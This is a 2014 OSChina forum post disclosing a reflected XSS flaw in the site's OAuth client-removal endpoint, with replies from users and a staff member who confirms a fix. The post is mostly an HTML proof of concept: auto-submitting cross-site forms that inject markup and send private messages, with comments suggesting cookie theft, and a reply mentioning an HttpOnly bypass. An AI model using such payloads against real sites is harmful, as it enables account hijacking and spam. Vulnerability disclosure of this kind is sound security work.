再来一个小小的漏洞

Leon_osc 发布于 2014/02/16 18:12
阅读 626
收藏 0

呵呵 闲的无聊发现的。

先说明漏洞纯属理论实现。站务 应该会立即修复。大家就随便看看就好了。

首先汇报 漏洞地址:http://www.oschina.net/action/oauth2/remove_client

参数 client_id 错误值 支持回显到页面上。

但是这个漏洞 有一个user参数 必须是自己的。 然后就有了下面一段 

=============================================================

<form id="xssForm" method="post" action ="http://www.oschina.net/action/oauth2/remove_client" target="a" >
<input name="user" value="0"/>
<textarea name="client_id">
<img src="http://static.oschina.net/uploads/user/0/12_200.jpg"/>
<!-- 就可以干别的事了 呵呵 盗取 cookie? 发广告 ? 别干坏事 红薯会不高兴的。-->
</textarea>
<input type="submit" />
</form>
<form id="msg" method="post" action="http://www.oschina.net/action/msg/send?receiver=156344" target="a">
<input name="content" value="text"/>
<input type="submit" />
</form>
<iframe src="" name="a" ></iframe><script>msg.submit()</script>
<script>
//ajax调用自己服务器上的一个接口 去获取最新的留言。
//然后根据留言的用户 获得他的id 具体获得方式 略 一般osc的头像上都有一个 user属性。
//然后填入 xxsForm 
//然后 xxsForm.submit()
//然后 嘿嘿 你懂的
</script>
============================================================

加载中
0
baba007
baba007

除非 你 绕过 http only ; 

去年 红薯  被 蟋蟀哥哥  一搞 , document.cookie 不能 得到 cookie 了

baba007
baba007
回复 @缪斯的情人 : 是啊, 我说 除非 你 懂得 绕过, 没说 启用了httponly 就是 100% 安全的
缪斯的情人
缪斯的情人
http only也不是完全保证获取不到cookie,比如典型的apache 400漏洞,其他服务器也有类似的漏洞
0
tsl0922
tsl0922
谢谢反馈!已经处理。这里是有点小问题,显示的时候没有做过滤
OSCHINA
登录后可查看更多优质内容
返回顶部
顶部